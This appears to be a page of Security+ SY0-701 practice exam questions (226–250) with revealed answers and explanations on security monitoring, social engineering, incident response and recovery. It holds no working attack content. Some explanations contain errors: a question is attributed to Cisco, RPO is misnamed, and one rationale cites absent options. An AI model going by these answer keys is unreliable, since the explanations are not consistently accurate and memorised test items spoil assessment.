Security+ SY0-701 (SY0-701) — Questions 226300

1152 questions total · 16pages · All types, answers revealed

Page 3

Page 4 of 16

Page 5
226
MCQmedium

A team moved a Linux VM to IaaS. They need OS login events, process activity, and network flow metadata sent to one central platform for alerting. What is the best first step?

A.Enable only perimeter security groups and assume the cloud provider will collect all host telemetry.
B.Deploy an endpoint logging agent and enable cloud-native flow logs to a centralized logging service.
C.Store the VM snapshots in object storage and review them manually during incidents.
D.Rely on the hypervisor console and disable guest-level logging to reduce overhead.
AnswerB

This gives visibility into both host activity and network metadata, which is needed for practical monitoring and investigation.

Why this answer

Option B is correct because deploying an endpoint logging agent (e.g., auditd, osquery, or a SIEM agent) on the Linux VM captures OS login events and process activity at the guest level, while enabling cloud-native flow logs (e.g., AWS VPC Flow Logs, Azure NSG flow logs) provides network flow metadata. Sending both to a centralized logging service (e.g., AWS CloudWatch Logs, Azure Log Analytics, or a third-party SIEM) ensures all required telemetry is aggregated for alerting. This approach directly addresses the need for host-level and network-level visibility without relying on the cloud provider to collect guest OS internals.

Exam trap

The trap here is that candidates may assume cloud providers automatically collect guest OS telemetry (like login events and process activity) when they only provide infrastructure-level logs (e.g., hypervisor or network flow logs), leading them to choose Option A or D incorrectly.

How to eliminate wrong answers

Option A is wrong because perimeter security groups only filter network traffic at the cloud boundary and do not collect OS login events, process activity, or network flow metadata; the cloud provider does not automatically collect host-level telemetry from guest VMs. Option C is wrong because storing VM snapshots in object storage is a backup/recovery method, not a real-time logging solution, and manual review during incidents is too slow and impractical for continuous alerting. Option D is wrong because relying solely on the hypervisor console provides only hypervisor-level logs (e.g., VM start/stop), not guest OS login events or process activity, and disabling guest-level logging removes the very data needed for security monitoring.

227
Multi-Selectmedium

A weekly vulnerability scan returns five findings across different systems. Which three should be remediated first? Select three.

Select 3 answers
A.A critical remote-code-execution flaw on an internet-facing VPN appliance with active exploitation reported.
B.A medium-severity missing patch on an offline lab VM with no network connectivity.
C.Default administrator credentials on an internet-facing management portal.
D.A high-severity remote-code-execution vulnerability on a public customer portal that stores account records.
E.A low-severity TLS configuration warning on a public site that does not handle sensitive information.
AnswersA, C, D

Correct because the issue is both highly exploitable and externally exposed. Active exploitation and internet reachability make this the highest-priority risk in the list.

Why this answer

Option A is correct because a critical remote-code-execution (RCE) vulnerability on an internet-facing VPN appliance with active exploitation reported represents the highest risk: it is exposed to the internet, allows full system compromise, and is actively being exploited in the wild, making immediate remediation essential to prevent a breach.

Exam trap

The trap here is that candidates might prioritize based solely on CVSS severity without considering the system's exposure, active exploitation status, or the presence of default credentials, leading them to incorrectly select a low-risk offline system or a low-severity warning over the truly critical findings.

228
MCQhard

A company runs payroll and HR application servers on the same VLAN because a redesign is not possible this quarter. Security wants to reduce lateral movement if one workload is compromised, but the team cannot renumber the environment or add new physical firewalls. Which control best fits the requirement?

A.Move the servers into a single larger subnet so internal routing is simplified
B.Implement microsegmentation with host-based or distributed firewall rules between workloads
C.Place the servers behind a network address translation device to hide their IP addresses
D.Rely on password rotation and MFA for administrative logins only
AnswerB

Microsegmentation is the best fit when the organization cannot redesign the network but still needs to isolate workloads more tightly. Host-based or distributed firewall rules can restrict east-west traffic between individual servers, even when they share the same VLAN. That reduces lateral movement far better than coarse VLAN-only separation and does not require renumbering the environment.

Why this answer

Microsegmentation using host-based or distributed firewall rules (e.g., via a hypervisor firewall or host firewall policies) allows the security team to enforce zero-trust east-west traffic controls between the payroll and HR servers without changing the VLAN, subnet, or adding physical firewalls. This directly reduces lateral movement by restricting communication to only what is necessary, even though both workloads share the same Layer 2 broadcast domain.

Exam trap

The trap here is that candidates often assume VLAN segmentation is the only way to isolate workloads, but the question explicitly prevents renumbering or adding firewalls, so the correct answer leverages host-based or distributed firewall rules to achieve microsegmentation without changing the network topology.

How to eliminate wrong answers

Option A is wrong because moving servers into a single larger subnet simplifies routing but does nothing to restrict lateral movement between workloads; in fact, it may increase the attack surface by placing more hosts in the same broadcast domain. Option C is wrong because placing servers behind a NAT device hides their IP addresses from external networks but does not restrict traffic between the two servers on the same VLAN; NAT operates at Layer 3/4 and does not enforce host-to-host segmentation within the same subnet. Option D is wrong because password rotation and MFA protect administrative logins but do not prevent a compromised workload from moving laterally to another server; they address authentication, not network-level or host-level traffic filtering.

229
MCQmedium

A SIEM correlates VPN authentication logs and sees 14 different user accounts receive one failed login attempt each from the same source IP during a 5-minute window. A few minutes later, one of those accounts successfully authenticates from that same IP. Which attack is most likely?

A.Brute-force attack against a single account using many passwords.
B.Password spraying using a common password against many accounts.
C.Replay attack using previously captured authentication traffic.
D.ARP poisoning used to intercept local network traffic.
AnswerB

This pattern matches a low-and-slow attempt across multiple accounts to avoid lockouts, with one account eventually succeeding.

Why this answer

The SIEM observed 14 different user accounts each receiving a single failed login attempt from the same source IP within a 5-minute window, followed by one account successfully authenticating. This pattern is characteristic of password spraying, where an attacker tries a common password (e.g., 'Password123') against many accounts to avoid triggering account lockouts, then leverages a successful guess. The single failure per account avoids the threshold for brute-force detection, and the eventual success confirms a guessed credential.

Exam trap

The trap here is that candidates confuse password spraying with brute-force attacks, failing to recognize that the key differentiator is the number of accounts targeted versus the number of passwords attempted per account.

How to eliminate wrong answers

Option A is wrong because a brute-force attack targets a single account with many password attempts, not multiple accounts with one attempt each. Option C is wrong because a replay attack requires capturing and retransmitting valid authentication traffic (e.g., a Kerberos TGT or NTLM hash), which would not produce failed login attempts from the same IP. Option D is wrong because ARP poisoning is a Layer 2 attack used to intercept local traffic on a switched network, not to generate VPN authentication logs with failed and successful logins from a single source IP.

230
Multi-Selectmedium

A Windows server is still running after suspected compromise. Before it is powered down, which two volatile data sources should be collected first? Select two.

Select 2 answers
A.A memory capture or RAM image from the live system.
B.A snapshot of active network connections and listening ports.
C.A full disk image from the powered-off server.
D.A hardware inventory report from the asset management database.
E.A screenshot of the server’s desktop wallpaper for reference.
AnswersA, B

A memory capture is one of the most important volatile data sources because it can reveal running malware, injected code, encryption keys, live network sessions, and command history not stored on disk. Once the system is powered off, this information is lost. Capturing RAM early gives investigators the best chance to reconstruct the attacker’s activity.

Why this answer

A memory capture (RAM image) preserves volatile data that is lost on power-down, including running processes, open network connections, encryption keys, and malware that exists only in memory. This is critical for forensic analysis of a live system suspected of compromise, as it captures the system state at the time of collection.

Exam trap

The trap here is that candidates often confuse the order of volatility and select a disk image (Option C) as a first step, not realizing that volatile data like RAM and network connections must be collected before powering down the system.

231
Multi-Selecthard

A support portal lets users upload files and name them manually. During review, a tester submits a filename containing path traversal sequences, and logs later show the application trying to access files outside the intended upload folder. Which two changes best address the flaw? Select two.

Select 2 answers
A.Validate and canonicalize the filename on the server, then allow only approved name patterns.
B.Store uploads outside the web root and deny execution permissions on the upload directory.
C.Increase the maximum upload size so the application can handle more files.
D.Add browser-side JavaScript validation to reject suspicious filenames.
E.Hide detailed error messages from end users only.
AnswersA, B

Server-side canonicalization and allowlisting stop attackers from escaping the expected directory structure. Client-side checks are not enough because attackers can modify requests directly. This is the most direct way to prevent traversal sequences from being interpreted as filesystem paths.

Why this answer

Option A is correct because server-side validation and canonicalization (e.g., using `realpath()` or `Path.GetFullPath()`) resolves path traversal sequences like `../` to an absolute path, which can then be checked against an allowlist of permitted patterns. This prevents the application from following malicious sequences to access files outside the intended upload directory. Without canonicalization, simple string filtering can be bypassed by encoding or alternative traversal patterns.

Exam trap

CompTIA often tests the misconception that client-side validation or error message hiding is sufficient to prevent server-side attacks, when in fact only server-side canonicalization and allowlisting can stop path traversal.

232
MCQeasy

A small company has two security issues and can fix only one this week. Which should be prioritized first? One issue is an internal lab server with a medium-severity flaw. The other is an internet-facing login portal using default administrator credentials.

A.Fix the internal lab server first because every vulnerability should be treated equally.
B.Fix the internet-facing login portal first because default administrator credentials create a much higher risk.
C.Wait until the monthly maintenance window so both issues can be fixed at the same time.
D.Ignore both issues until users report symptoms, then respond if something happens.
AnswerB

This is the best choice because a public-facing system with default credentials is far more likely to be attacked and can lead to immediate compromise. Risk prioritization considers both likelihood and impact, not just severity labels. Exposed administrative access can quickly become a business-wide incident, so it should be addressed first.

Why this answer

The internet-facing login portal using default administrator credentials represents an immediate, high-impact risk because it allows unauthorized remote access with administrative privileges. Default credentials are well-known and actively targeted by automated scanners and attackers, making exploitation trivial. In contrast, the internal lab server with a medium-severity flaw is behind network segmentation and requires additional access, so its risk is lower and can be deferred.

Exam trap

Cisco often tests the principle of prioritizing vulnerabilities based on risk (likelihood and impact) rather than treating all vulnerabilities equally, and the trap here is assuming that severity alone (medium vs. high) determines priority without considering exposure and exploitability.

How to eliminate wrong answers

Option A is wrong because it incorrectly assumes all vulnerabilities should be treated equally, ignoring the critical factor of exploitability and exposure; a medium-severity flaw on an internal server is far less urgent than default admin credentials on an internet-facing portal. Option C is wrong because delaying both fixes until a monthly maintenance window leaves a critical authentication bypass vulnerability exposed for an extended period, which is unacceptable when immediate remediation is possible.

233
Multi-Selectmedium

An organization wants to reduce the risk of malware infections from removable media. Which three of the following controls should be implemented? (Choose three.)

Select 3 answers
.Disabling AutoRun and AutoPlay features
.Enforcing a policy of full disk encryption on all removable drives
.Using group policy to block execution from removable media
.Scanning all removable media with antivirus software upon insertion
.Requiring all removable media to be formatted as NTFS
.Installing a host-based intrusion detection system on every workstation

Why this answer

Disabling AutoRun and AutoPlay features prevents malicious code from executing automatically when removable media is inserted, which is a common infection vector. Using group policy to block execution from removable media stops any executable files from running, even if manually launched. Scanning all removable media with antivirus software upon insertion detects and quarantines known malware before it can interact with the system.

Exam trap

The trap here is that candidates often confuse data protection controls (like encryption) with execution prevention controls, or they assume that file system formatting (NTFS) provides security against malware execution.

234
MCQmedium

A security analyst receives multiple alerts indicating that several users in the finance department clicked a malicious link in an email. The analyst has confirmed the email subject line and sender address. Which of the following is the BEST first step to contain the incident?

A.Block the sender's email address at the email gateway.
B.Disable the users' accounts.
C.Perform a forensic analysis of the emails.
D.Delete the emails from the users' mailboxes.
AnswerA

This is correct because blocking the sender at the email gateway prevents any further malicious emails from that source from reaching users, effectively containing the threat at its entry point.

Why this answer

Blocking the sender's email address at the email gateway is the best first step because it immediately prevents further malicious emails from that sender from reaching any users, containing the incident at the perimeter. This action stops the spread of the attack without disrupting user productivity or requiring time-consuming analysis, aligning with the priority of containment in incident response.

Exam trap

The trap here is that candidates confuse containment with eradication or investigation, choosing to delete emails (Option D) or analyze them (Option C) first, when the immediate priority is to stop the attack vector at the gateway to prevent further compromise.

How to eliminate wrong answers

Option B is wrong because disabling users' accounts is an overly aggressive containment step that disrupts legitimate work and is typically reserved for compromised accounts or active credential misuse, not for users who merely clicked a link. Option C is wrong because performing forensic analysis of the emails is a post-containment investigation step; it delays immediate containment and should be done after blocking the threat. Option D is wrong because deleting emails from users' mailboxes only removes the current messages but does not prevent the sender from sending new malicious emails, leaving the organization vulnerable to further attacks.

235
Multi-Selecthard

A payment application must keep running if one application server fails, and the business can tolerate no more than 5 minutes of lost transactions and 30 minutes of downtime during a site outage. Which two controls best match the availability requirements? Select two.

Select 2 answers
A.Deploy at least two active application nodes behind a load balancer so one server failure does not interrupt service.
B.Use a cold site that is powered off until a disaster is declared.
C.Configure near-real-time database replication or synchronous replication to a standby so recent transactions are preserved.
D.Take nightly backups to meet the 5-minute recovery point objective.
E.Rely on weekly VM snapshots because they are faster than replication.
AnswersA, C

A load balancer with multiple active nodes removes the single-server dependency and lets traffic continue if one node fails or is taken down for maintenance. This directly addresses the requirement to survive an application server failure without stopping the service. It is a standard high-availability design for front-end and application tiers.

Why this answer

Option A is correct because deploying at least two active application nodes behind a load balancer ensures that if one server fails, traffic is automatically redirected to the remaining healthy node(s), achieving zero downtime for the application itself. This directly meets the requirement that the payment application must keep running if one application server fails, without any interruption to service.

Exam trap

The trap here is that candidates often confuse recovery point objective (RPO) with recovery time objective (RTO), mistakenly choosing nightly backups (Option D) or weekly snapshots (Option E) because they think any backup meets the RPO, but the 5-minute RPO requires near-continuous data protection, not periodic backups.

236
MCQeasy

Several employees receive a text message that says their payroll deposit failed and they must tap a link to verify account details. The link opens a fake login page. What type of attack is this?

A.Phishing
B.Smishing
C.Pretexting
D.Baiting
AnswerB

Smishing is phishing delivered through SMS or other text messaging services.

Why this answer

Smishing is a form of phishing that uses SMS (Short Message Service) text messages as the attack vector. In this scenario, the attacker sends a fraudulent text message claiming a payroll deposit failure and includes a link to a fake login page, which is the classic mechanism of smishing. The attack relies on social engineering via SMS to trick the recipient into revealing sensitive credentials.

Exam trap

The trap here is that candidates often confuse 'smishing' with general 'phishing' because they do not differentiate the delivery vector (SMS vs. email), but the SY0-701 exam expects you to identify the specific attack type based on the communication channel used.

How to eliminate wrong answers

Option A is wrong because phishing is a broad category of social engineering attacks typically carried out via email, not specifically via SMS text messages; while smishing is a subset of phishing, the question explicitly describes an SMS-based attack, making 'smishing' the more precise term. Option C is wrong because pretexting involves fabricating a scenario (pretext) to obtain information, often through impersonation or a false backstory, but it does not necessarily involve a direct link to a fake login page or the use of SMS as the delivery mechanism. Option D is wrong because baiting relies on offering something enticing (e.g., a free download or USB drive) to lure the victim into a trap, whereas this attack uses a false sense of urgency (payroll failure) and a link to a fake login page, which is characteristic of smishing, not baiting.

237
MCQmedium

An HR manager wants to share employee data with a benefits analytics vendor. The dataset includes names, employee IDs, home addresses, and medical leave codes. Security wants to reduce privacy exposure while still allowing the vendor to complete the analysis. What is the best first step?

A.Send the full file as-is if the vendor agrees not to disclose it
B.Provide only the minimum necessary fields and replace direct identifiers with project IDs
C.Keep the names but mark the spreadsheet confidential before sending it
D.Upload the file to a public cloud folder and restrict the link to the vendor
AnswerB

Minimizing fields and pseudonymizing direct identifiers reduces privacy exposure while still supporting the business purpose.

Why this answer

Option B is correct because it implements data minimization, a core privacy principle, by providing only the minimum necessary fields and replacing direct identifiers (names, employee IDs) with project-specific pseudonyms. This reduces exposure of personally identifiable information (PII) while preserving the vendor's ability to perform analytics on the medical leave codes and other non-identifying data. It aligns with the CompTIA SY0-701 objective of applying privacy-enhancing techniques like anonymization and data masking.

Exam trap

The trap here is that candidates often assume a legal agreement (Option A) or confidentiality marking (Option C) is sufficient for data protection, but CompTIA emphasizes that technical controls like data minimization and pseudonymization are the first and most effective steps to reduce privacy exposure.

How to eliminate wrong answers

Option A is wrong because sending the full file as-is, even with a non-disclosure agreement, still exposes all PII (names, addresses, medical codes) to the vendor, violating the principle of least privilege and increasing breach risk. Option C is wrong because marking a spreadsheet as confidential does not technically protect the data; it relies on trust rather than technical controls like access restrictions or data masking, and the file remains fully readable. Option D is wrong because uploading to a public cloud folder with a restricted link still exposes the full dataset to anyone who obtains the link, and cloud storage does not inherently apply data minimization or pseudonymization.

238
Matchingmedium

Match each procurement need to the vendor due diligence artifact or control that best fits. 1. Procurement wants independent evidence that a SaaS provider's controls operated effectively during the last year. 2. The team wants to know what files, libraries, and modules were included in a supplier's software build. 3. The business needs a signed agreement that defines how customer data is handled and what the vendor must do if an incident occurs. 4. The procurement team wants answers about MFA, logging, and incident response before onboarding a cloud supplier.

Drag a concept onto its matching description — or click a concept then click the description.

Concepts
Matches

SOC 2 Type II report

Software bill of materials (SBOM)

Data processing agreement (DPA)

Security questionnaire

Why these pairings

Each artifact or control directly addresses the procurement need: SOC 2 Type II provides independent audit evidence; SBOM lists software components; DPA is the legal agreement for data handling; security questionnaires gather specific security practices; pen test reports validate controls; BCP ensures continuity.

239
MCQmedium

Based on the exhibit, which change best reduces the risk of lateral movement if a user workstation is compromised?

A.Add more workstations to VLAN 10 so authentication requests are faster.
B.Require administrative access through a hardened bastion host and restrict direct management from user devices.
C.Disable logging on the servers so attackers leave fewer traces if they connect.
D.Move all servers into the same VLAN as the workstations for easier access control.
AnswerB

A bastion host creates a controlled management path instead of allowing every workstation to talk directly to servers. Restricting direct SSH and RDP from the user VLAN reduces attack surface and supports a zero-trust-style approach to administration.

Why this answer

Requiring administrative access through a hardened bastion host enforces a jump-box architecture, which eliminates direct RDP, SSH, or WinRM from user workstations to servers. This segmentation prevents an attacker who compromises a user workstation from using stolen credentials or tools to laterally move to sensitive servers, as all management traffic must pass through a controlled, monitored, and often multi-factor-authenticated bastion host.

Exam trap

CompTIA often tests the misconception that adding more resources to a VLAN or disabling logging improves security, when in fact these actions weaken segmentation and reduce visibility, respectively.

How to eliminate wrong answers

Option A is wrong because adding more workstations to VLAN 10 does not reduce lateral movement risk; it increases the attack surface and does not address the need for network segmentation or access control between user devices and servers. Option C is wrong because disabling logging on servers removes the audit trail that is critical for detecting and investigating lateral movement, directly violating security best practices and compliance requirements. Option D is wrong because moving all servers into the same VLAN as workstations collapses the security boundary, allowing any compromised workstation to directly reach servers without any network-level controls, thereby increasing lateral movement risk.

240
MCQeasy

A finance manager gets a phone call from someone claiming to be the CEO's assistant, urgently requesting a wire transfer before a board meeting. What type of attack is this?

A.Smishing
B.Vishing
C.Spear phishing
D.Watering-hole attack
AnswerB

This is a phone-based social engineering attempt that uses urgency and impersonation.

Why this answer

B is correct because vishing (voice phishing) uses a phone call to socially engineer the victim into performing a sensitive action, such as a wire transfer. The attacker impersonates a trusted authority (the CEO's assistant) and exploits urgency to bypass normal verification procedures. This is distinct from text-based phishing (smishing) or targeted email attacks (spear phishing).

Exam trap

The trap here is that candidates confuse the delivery method (phone call) with the attack type, often choosing 'spear phishing' because the target is a specific individual, but the defining characteristic is the voice channel, not the targeting precision.

How to eliminate wrong answers

Option A is wrong because smishing relies on SMS/text messages, not voice calls, to deliver the phishing lure. Option C is wrong because spear phishing is a targeted email attack that uses personalized content, not a real-time phone conversation. Option D is wrong because a watering-hole attack compromises a legitimate website frequented by the target group to deliver malware, not a direct social engineering call.

241
MCQmedium

A vulnerability scan produces these results: - Finding 1: High severity, internet-facing VPN appliance, known exploit available, no compensating controls - Finding 2: Critical severity, internal development workstation, requires authenticated local access - Finding 3: Medium severity, test server, no public exploit and not reachable from outside Which finding should be remediated first?

A.Finding 1
B.Finding 2
C.Finding 3
D.All findings are equal because the severity rating alone determines priority
AnswerA

An internet-facing VPN with known exploit code and no compensating controls presents the highest practical risk because it is exposed and readily exploitable.

Why this answer

Finding 1 should be remediated first because it combines high severity with an internet-facing attack surface and a known exploit, meaning an attacker can remotely compromise the VPN appliance without authentication or compensating controls. This creates an immediate and direct risk of network breach, unlike the other findings which require local access or are isolated from external threats.

Exam trap

The trap here is that candidates prioritize by severity alone (Critical > High) without considering the attack vector, exploitability, and network exposure, which are key to risk-based prioritization in the SY0-701 exam.

How to eliminate wrong answers

Option B is wrong because although the severity is critical, the vulnerability requires authenticated local access, meaning an attacker must already have a foothold inside the network, making it less urgent than an internet-facing exploit. Option C is wrong because medium severity on a test server with no public exploit and no external reachability poses minimal immediate risk, as exploitation requires both access and a custom attack. Option D is wrong because severity rating alone does not determine priority; factors like exposure, exploit availability, and compensating controls must be considered in risk-based remediation.

242
MCQmedium

During a restore test, a technician brings back a file server successfully, but the application team discovers that the database is missing the last 12 hours of transactions. Management says the business can tolerate only one hour of data loss. What should be changed first?

A.Reduce the restore point objective by storing more copies of the same backup.
B.Implement application-consistent backups or transaction log backups more frequently.
C.Extend the retention period so the full backup is kept for 90 days.
D.Shorten the recovery time objective by using faster storage for the server.
AnswerB

A one-hour data-loss target requires more frequent capture of changed database state. Application-consistent backups or transaction log backups reduce the gap between backups and allow recovery closer to the required recovery point objective.

Why this answer

The core issue is that the database is missing 12 hours of transactions, which exceeds the business's tolerance of one hour of data loss. This indicates that the Recovery Point Objective (RPO) is not being met. Implementing application-consistent backups or more frequent transaction log backups ensures that the database state can be recovered to a point within the acceptable loss window, directly addressing the RPO gap.

Exam trap

The trap here is confusing Recovery Point Objective (RPO) with Recovery Time Objective (RTO), leading candidates to select options that improve restore speed (RTO) or backup retention rather than addressing the frequency of backups needed to limit data loss.

How to eliminate wrong answers

Option A is wrong because reducing the Restore Point Objective (RPO) by storing more copies of the same backup does not change the frequency of backups; it only increases redundancy, which does not reduce data loss. Option C is wrong because extending the retention period (e.g., keeping full backups for 90 days) addresses how long backups are kept, not how recent the recoverable data is, so it does not solve the RPO issue. Option D is wrong because shortening the Recovery Time Objective (RTO) by using faster storage focuses on how quickly the server can be restored, not on minimizing data loss, which is an RPO concern.

243
Multi-Selecthard

A security team receives a macro-enabled spreadsheet from a supplier. The file must be analyzed before any user opens it, and if the same payload later executes on an endpoint the organization wants the ability to contain it automatically. Which two tools best fit those requirements? Select two.

Select 2 answers
A.Use a sandbox to detonate the attachment in an isolated environment before delivery.
B.Use EDR so the endpoint can be quarantined or isolated if the payload executes.
C.Deploy a WAF in front of the mail gateway.
D.Create a DNS sinkhole entry only after the file is opened by a user.
E.Use DLP to stop the spreadsheet from containing macros.
AnswersA, B

Sandboxing lets analysts observe real behavior safely before the file reaches a user workstation.

Why this answer

Option A is correct because a sandbox detonates the macro-enabled spreadsheet in an isolated environment before delivery, allowing the security team to observe malicious behavior (e.g., payload extraction, network calls) without risk to production systems. This pre-delivery analysis ensures the file is safe before any user opens it, directly meeting the requirement to analyze the file before user access.

Exam trap

The trap here is that candidates may confuse a WAF (designed for web traffic) with an email security gateway or mistakenly think a DNS sinkhole can analyze file contents, when in fact it only blocks DNS resolution after a domain is flagged.

244
MCQmedium

A threat report says an attacker changes domains daily and rehosts infrastructure in cloud VPS environments, but the phishing email wording, login-page flow, and PowerShell download behavior remain the same. What type of information is most useful for a durable detection rule?

A.Only the current malware hash from the latest sample
B.The attacker’s behavioral pattern and technique sequence
C.The names of the victim company’s departments
D.A screenshot of the phishing email subject line only
AnswerB

Technique-based indicators are more durable because the attacker can rotate infrastructure without changing core behavior.

Why this answer

Option B is correct because the attacker's behavioral pattern and technique sequence remain consistent even as infrastructure changes. A durable detection rule should focus on the invariant TTPs (Tactics, Techniques, and Procedures) such as the phishing email wording, login-page flow, and PowerShell download behavior, which are stable indicators of compromise (IOCs) that persist across domain and IP changes. This aligns with the MITRE ATT&CK framework's emphasis on detecting adversary behaviors rather than ephemeral artifacts like hashes or IP addresses.

Exam trap

CompTIA often tests the misconception that static IOCs like hashes or subject lines are reliable for detection, when in fact behavioral patterns and technique sequences provide durable detection against rapidly changing infrastructure.

How to eliminate wrong answers

Option A is wrong because malware hashes change with each new sample, making them ephemeral IOCs that cannot provide durable detection when the attacker rehosts infrastructure daily. Option C is wrong because victim company department names are irrelevant to the attacker's technical behavior and do not help detect the phishing or download sequence. Option D is wrong because a screenshot of the phishing email subject line is a static, easily changed artifact that does not capture the invariant login-page flow or PowerShell download behavior.

245
MCQmedium

A help desk ticket confirms that a user entered corporate credentials into a fake sign-in page. Minutes later, the security team finds a new mailbox forwarding rule and evidence that the attacker added backup MFA codes. After disabling the account, what should the team do next to support containment and recovery?

A.Wait for the user to confirm the behavior before taking any further steps.
B.Reimage the user's laptop before reviewing the account activity.
C.Revoke active sessions and reset the compromised credentials.
D.Close the ticket because MFA was enabled and should have prevented access.
AnswerC

After disabling the account, the next step is to cut off any valid sessions and reset the credential set so the attacker cannot continue using stolen access. Because the compromise includes mailbox changes and MFA backup code manipulation, session revocation and credential reset are essential containment and recovery tasks.

Why this answer

Option C is correct because after disabling a compromised account, the immediate next step is to revoke all active sessions and reset the credentials. This ensures the attacker cannot maintain access via existing tokens or session cookies, and the new password invalidates any cached or stolen credentials. This aligns with the NIST SP 800-61 incident response containment phase, which prioritizes cutting off active attacker access before further investigation.

Exam trap

The trap here is that candidates assume MFA is a silver bullet and overlook that attackers can register their own MFA devices or use session hijacking, making credential reset alone insufficient without session revocation.

How to eliminate wrong answers

Option A is wrong because waiting for user confirmation delays containment and allows the attacker to continue using the account, potentially exfiltrating data or moving laterally. Option B is wrong because reimaging the user's laptop is premature and unnecessary; the compromise is credential-based, not a local system infection, and reviewing account activity first is critical to understand the scope. Option D is wrong because MFA does not prevent credential theft or session hijacking; the attacker added backup MFA codes, bypassing the protection, and closing the ticket ignores the active threat.

246
MCQmedium

A workstation opens an attachment labeled as an invoice and then begins creating scheduled tasks, disabling security services, and contacting a known malicious IP address. What is the best first containment action?

A.Run a full antivirus scan while leaving the system connected
B.Isolate the workstation from the network using the EDR containment feature
C.Reboot the workstation to clear any active malicious processes
D.Uninstall the email client that delivered the attachment
AnswerB

EDR-based isolation stops command-and-control traffic and limits further spread while preserving the system for investigation.

Why this answer

Option B is correct because the workstation is actively communicating with a known malicious IP address and disabling security services, indicating an active compromise. Isolating the workstation via EDR containment immediately stops the outbound command-and-control traffic and prevents lateral movement, which is the priority first step in incident response before any remediation or analysis.

Exam trap

The trap here is that candidates often choose to run an antivirus scan or reboot first, thinking they can clean the infection, but the exam emphasizes that containment (stopping the spread and C2) is the immediate priority over remediation or removal.

How to eliminate wrong answers

Option A is wrong because running a full antivirus scan while the system is still connected to the network does not stop ongoing malicious activity, such as C2 communication or scheduled task creation, and may allow the malware to spread. Option C is wrong because rebooting the workstation may clear active processes but does not remove persistence mechanisms like scheduled tasks, and the malware could re-establish contact with the C2 server upon reboot, while also losing volatile forensic data. Option D is wrong because uninstalling the email client does not address the active compromise already in progress; the malware is already executing and communicating, so removing the delivery vector is irrelevant to immediate containment.

247
MCQmedium

A user's laptop suddenly shows encrypted .docx files, a ransom note, and the EDR console reports mass file renames and shadow copy deletion. The device is still online and connected to the corporate VPN. What is the best immediate action?

A.Reboot the laptop into safe mode and attempt manual malware removal.
B.Quarantine the endpoint from the network through EDR or physical isolation.
C.Restore the affected files from backup before taking any other action.
D.Tell the user to change their password and continue working from the same laptop.
AnswerB

Isolating the system immediately contains the ransomware, limits lateral spread, and preserves the device for later investigation. Because the host is still connected to the VPN, it could continue encrypting mapped drives or reach other systems. Containment comes before eradication or recovery, especially when destructive behavior is still active.

Why this answer

Option B is correct because the immediate priority in a confirmed ransomware incident is to contain the threat by isolating the compromised host from the network. The EDR console showing mass file renames and shadow copy deletion indicates active encryption and lateral movement risk. Quarantining via EDR or physically disconnecting the network cable stops the ransomware from encrypting additional shares or communicating with its C2 server, preserving evidence and preventing further damage.

Exam trap

The trap here is that candidates may choose to restore from backups (Option C) first, not realizing that the infected host must be isolated before any recovery attempt to prevent immediate re-encryption of restored files.

How to eliminate wrong answers

Option A is wrong because rebooting into safe mode and attempting manual malware removal is a forensic step that should only occur after containment; it risks the ransomware continuing to encrypt files during the reboot process and does not stop network propagation. Option C is wrong because restoring files from backup before isolating the endpoint could allow the ransomware to re-encrypt the restored files if the host is still online, and it may also overwrite critical forensic evidence. Option D is wrong because telling the user to change their password and continue working ignores the active encryption and allows the ransomware to spread to network shares and other systems via the VPN connection, violating incident response containment principles.

248
Multi-Selectmedium

A company-owned laptop is being transferred from the incident site to the evidence locker for a theft investigation. Which two actions best support chain of custody during transport? Select two.

Select 2 answers
A.Place the device in a tamper-evident evidence bag or seal
B.Document the device serial number, date, time, collector, and each handoff
C.Leave the device unsealed so legal staff can inspect it quickly
D.Boot the laptop to confirm the user’s files are still present
E.Use a personal note app instead of formal transfer documentation
AnswersA, B

A tamper-evident seal helps prove whether the evidence package was opened or altered.

Why this answer

Option A is correct because placing the device in a tamper-evident evidence bag or seal provides a physical barrier that immediately reveals any unauthorized access during transport. This is a foundational chain-of-custody control that preserves the integrity of the evidence by making tampering detectable, which is critical for admissibility in legal proceedings.

Exam trap

The trap here is that candidates may think booting the laptop is necessary to verify data presence, but this action actually violates forensic preservation principles by altering the system state and potentially destroying evidence.

249
MCQeasy

A caller says they are from the help desk and need the employee's MFA code to "complete a password reset". Which social engineering technique is being used?

A.Phishing
B.Pretexting
C.DDoS
D.SQL injection
AnswerB

The caller is inventing a believable story and role to trick the employee into revealing a secret code.

Why this answer

Pretexting is a social engineering technique where an attacker fabricates a scenario (the pretext) to trick a victim into divulging sensitive information. In this case, the attacker pretends to be from the help desk and invokes a false password reset procedure to obtain the employee's MFA code, which should never be shared. The MFA code is a time-based one-time password (TOTP) or push notification response that authenticates the user, not a tool for password resets.

Exam trap

The trap here is that candidates may confuse pretexting with phishing because both involve deception, but pretexting relies on a fabricated identity and scenario (often via phone or in-person) rather than a malicious electronic message.

How to eliminate wrong answers

Option A is wrong because phishing typically involves sending fraudulent emails or messages that contain malicious links or attachments to steal credentials or install malware, not a direct phone call requesting an MFA code under a false pretext. Option C is wrong because a DDoS (Distributed Denial of Service) attack is a network-level attack that overwhelms a target server with traffic to disrupt services, and it has no relation to social engineering or obtaining an MFA code via impersonation.

250
MCQmedium

Users on the internal Wi-Fi report that the finance portal suddenly resolves to a different IP address, and the browser shows a fake login page that closely matches the real site. The DNS resolver cache on the network also contains unexpected entries for that host name. What attack is most likely?

A.ARP spoofing, because the attacker is changing the MAC address used on the local network.
B.DNS poisoning, because the attacker has corrupted name resolution so users are sent to a malicious destination.
C.Port scanning, because the attacker is probing internal services for open ports.
D.Denial-of-service, because the attacker is overwhelming the portal with traffic.
AnswerB

DNS poisoning fits the evidence because the resolver cache contains bad entries and users are being directed to a fake site through altered name resolution. That lets the attacker redirect traffic without changing the user’s bookmarks or typing habits.

Why this answer

B is correct because DNS poisoning (also known as DNS cache poisoning) directly corrupts the name resolution process, causing the finance portal's hostname to resolve to a malicious IP address. The presence of unexpected DNS resolver cache entries for that hostname confirms that the attack targeted the DNS infrastructure, not the ARP table or network availability.

Exam trap

The trap here is that candidates confuse ARP spoofing with DNS poisoning because both can redirect traffic, but ARP spoofing operates at Layer 2 and does not affect DNS resolver cache entries, whereas DNS poisoning directly corrupts the name resolution database.

How to eliminate wrong answers

